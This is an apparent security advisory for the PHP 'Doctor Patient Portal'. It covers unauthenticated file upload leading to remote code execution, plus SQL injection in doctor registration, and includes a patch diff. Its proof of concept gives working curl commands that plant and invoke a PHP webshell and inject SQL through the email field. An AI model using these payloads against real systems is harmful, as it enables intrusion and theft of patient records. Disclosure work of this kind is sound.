Share
## https://sploitus.com/exploit?id=9F909712-BD5A-5DA3-A1F1-6729769D94B0
# CVE-2026-XXXXX
## Unauthenticated Arbitrary File Upload (RCE) + SQL Injection in Doctor Patient Portal
---
### Advisory Information
| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package/Product** | Doctor Patient Portal |
| **Affected Versions** | All versions through commit `5a138db` |
| **Patched Versions** | None |
| **Severity** | **CRITICAL (CVSS 9.8)** |
| **CWE** | CWE-434 (Unrestricted File Upload) + CWE-89 (SQL Injection) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Repository** | https://github.com/thegr8dev/doctorpatientportal |
| **Stars** | 69 โญ |
---
### Summary
The Doctor Patient Portal contains two critical unauthenticated vulnerabilities in `dp.php`: arbitrary file upload allowing PHP webshell deployment (profile picture upload has zero MIME validation), and SQL injection in the doctor registration INSERT query. No input sanitization or prepared statements are used anywhere in data-entry files.
---
### Affected Component
| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package** | thegr8dev/doctorpatientportal |
| **Vendor** | thegr8dev |
| **Affected Versions** | All (commit `5a138db`) |
| **Patched Versions** | None |
| **File** | `dp.php`, lines 119โ123 |
---
### Description
`dp.php` handles doctor registration with no authentication. The profile picture upload has no MIME validation, and all form fields are inserted into SQL without escaping:
**Vulnerability #1 โ Unrestricted File Upload (CWE-434):**
```php
// dp.php โ unauthenticated, NO MIME check on profile picture
$docpic = $_FILES['newpic']['name']; // user-controlled filename (*.php allowed)
$temp2 = $_FILES['newpic']['tmp_name'];
// ... INSERT doctor record into database ...
mkdir($location, 0777, true);
move_uploaded_file($temp2, "doctor/$docid/img/$docpic"); // โ PHP file in webroot!
```
Only the document upload checks MIME (`application/pdf` required). The profile picture upload at line 123 has zero validation.
**Vulnerability #2 โ SQL Injection (CWE-89):**
```php
// dp.php line 119 โ raw $_POST values, no prepare(), no escape
$q = "insert into doctor values('', '$name', '$email', '$pass', '$age', '$phone',
'$status', '$type', '$address', '$gender', '$docid', '$adrid', '$cat','$location2',
'', '$question', '$answer')";
mysqli_query($con, $q);
```
Zero `mysqli_real_escape_string()` or `mysqli_prepare()` calls in the entire codebase.
---
### Proof of Concept
**Step 1 โ Register as doctor with PHP webshell as profile picture:**
```bash
curl -X POST "http://target/dp.php" \
-F "btn_doc=1" \
-F "name=Hacker" \
-F "email=hack@evil.com" \
-F "password=Pass123" \
-F "age=30" \
-F "phone=1234567890" \
-F "address=123+Main+St" \
-F "gender=Male" \
-F "docid=DOC001" \
-F "adrid=ADR001" \
-F "cat=General" \
-F "question=Favorite+color" \
-F "answer=blue" \
-F "file=@document.pdf;type=application/pdf" \
-F "newpic=@shell.php;type=image/jpeg"
# Profile pic shell.php uploaded to doctor/DOC001/img/shell.php
```
**Step 2 โ Execute commands:**
```bash
curl "http://target/doctor/DOC001/img/shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data)
```
**Step 3 โ SQL Injection (via email parameter):**
```bash
curl -X POST "http://target/dp.php" \
-F "btn_doc=1" \
-F "email=hack@evil.com', 'pass', 30, '123', 'pending', 'doc', 'addr', 'M', 'DOC002', 'ADR', 'General', './x', '', 'q', 'a')-- " \
-F "password=x" -F "name=x" -F "age=30" -F "phone=1" -F "address=x" \
-F "gender=M" -F "docid=DOC002" -F "adrid=ADR" -F "cat=General" \
-F "question=q" -F "answer=a" \
-F "file=@doc.pdf;type=application/pdf" \
-F "newpic=@test.jpg"
# Injects arbitrary doctor record via email SQL injection
```
---
### Impact
| CIA | Level | Description |
|-----|-------|-------------|
| Confidentiality | **HIGH** | RCE via webshell โ read patient records, prescriptions, personal data |
| Integrity | **HIGH** | SQLi: arbitrary INSERT + RCE: modify any file |
| Availability | **HIGH** | Delete files, drop tables |
**Data at risk:** Patient medical records, doctor credentials, prescriptions, personal health information.
---
### Patches
```diff
+ $allowed = ['jpg','jpeg','png'];
+ $ext = strtolower(pathinfo($_FILES['newpic']['name'], PATHINFO_EXTENSION));
+ if(!in_array($ext, $allowed)) { die("Invalid image type"); }
- $q = "insert into doctor values('', '$name', ...)";
- mysqli_query($con, $q);
+ $stmt = mysqli_prepare($con, "INSERT INTO doctor VALUES (?,?,?,...)");
+ mysqli_stmt_bind_param($stmt, "ssss...", $name, $email, ...);
+ mysqli_stmt_execute($stmt);
```
---
### References
| Type | URL |
|------|-----|
| Repository | https://github.com/thegr8dev/doctorpatientportal |
| Vulnerable code | https://github.com/thegr8dev/doctorpatientportal/blob/main/dp.php#L123 |
| CWE-434 | https://cwe.mitre.org/data/definitions/434.html |
| CWE-89 | https://cwe.mitre.org/data/definitions/89.html |
---
### Verification
```bash
git clone https://github.com/thegr8dev/doctorpatientportal && cd *
grep -n "move_uploaded_file.*newpic\|move_uploaded_file.*docpic" dp.php # line 123 โ no MIME
grep -n "mysqli_query.*insert" dp.php # line 120 โ raw SQL
grep -c "prepare\|real_escape" dp.php # 0
```
---
### Credits
| Role | Name |
|------|------|
| **Finder** | Fatullayev Asadbek |
| **Reporter** | Fatullayev Asadbek |
| **GitHub** | Kimdir01 |
---
### Timeline
| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered and verified |
| 2026-06-28 | Vendor notified via private disclosure |
| TBD | Vendor acknowledgment / response |
| TBD | CVE ID assigned |
| TBD + 90 days | Coordinated public disclosure |
---
### CVSS v3.1
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H โ 9.8 CRITICAL
AV:N โ Remote over HTTP
AC:L โ Simple multipart POST
PR:N โ No authentication (doctor registration is public)
UI:N โ No user interaction
S:U โ Same security context
C:H โ RCE webshell: read patient DB, medical records
I:H โ SQLi: arbitrary INSERT + RCE: overwrite any file
A:H โ RCE: delete files, drop database
```